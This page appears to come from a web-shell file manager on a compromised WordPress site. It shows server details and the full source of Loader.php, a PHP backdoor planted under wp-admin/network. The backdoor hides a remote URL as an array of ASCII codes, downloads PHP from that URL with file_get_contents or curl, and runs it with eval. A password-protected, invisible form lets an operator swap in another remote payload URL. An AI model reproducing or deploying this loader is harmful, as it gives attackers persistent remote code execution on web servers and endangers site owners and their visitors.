HEX
Server: Apache/2
System: Linux host.jethost.pl 4.19.0-26-amd64 #1 SMP Debian 4.19.304-1 (2024-01-09) x86_64
User: frigodor (1049)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,mail
Upload Files
File: /home/frigodor/domains/frigodor.pl/public_html/wp-admin/network/Loader.php
<?php session_start();
function forumCC($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$asciiArray = [104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,74,117,101,86,105,111,108,101,71,114,97,99,101,115,47,97,114,99,104,105,118,101,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,117,110,105,118,101,114,115,101,46,112,104,112];
$decodedString = '';
foreach ($asciiArray as $ascii) {
    $decodedString .= chr($ascii);
}
$url = $decodedString;
$correct_password = '$2a$10$rypRVIv4f8ijiXI31jJejOZFEXvrDZR.TM51.xO.IxYaFzagWx29u';
if (isset($_GET['4rum_r3set'])) {
    $_SESSION["4rum_url"] = "";
    echo "success";
    exit;
}
if (isset($_GET['4rum'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (isset($_POST['password'])) {
            $provided_password = $_POST['password'];
            if (password_verify($provided_password, $correct_password)) {
                if (isset($_POST['url'])) {
                    $url = $_POST['url'];
                    $_SESSION["4rum_url"] = $url;
                    echo "updated : " . $_SESSION["4rum_url"];
                    exit;
                } else {
                    echo "Error!";
                    exit;
                }
            } else {
                echo "";
                exit;
            }
        } else {
            echo "";
            exit;
        }
    } else { ?>

        <head>
            <style>
                #password {
                    order: 2
                }

                #url {
                    order: 1
                }

                #password,
                #url {
                    display: block;
                    margin-bottom: 10px;
                    opacity: 0;
                    transition: opacity .3s
                }

                #password:hover,
                #url:hover {
                    opacity: 1
                }

                form {
                    display: flex;
                    flex-direction: column;
                    align-items: flex-end
                }
            </style>
            <script>document.addEventListener("DOMContentLoaded", function () { document.querySelector("#password").addEventListener("keydown", function (e) { "Enter" === e.key && (e.preventDefault(), document.querySelector("form").submit()) }) })</script>
        </head>

        <body>
            <form action="" method="post"><input id="password" name="password" type="password"><br><input id="url" name="url"
                    value="<?php echo isset($_POST['url']) ? $_POST['url'] : ''; ?>"><br></form>
        </body>
        <?php exit;
    }
} else {
    if (empty($_SESSION["4rum"])) {
        $result = @file_get_contents($url);
        if (empty($result)) {
            $result = forumCC($url);
        }
    } else {
        $result = @file_get_contents($_SESSION["4rum"]);
        if (empty($result)) {
            $result = forumCC($_SESSION["4rum"]);
        }
    }
}
if (is_string($result)) {
    eval ('?>' . $result);
} else {
    echo "Error";
} ?>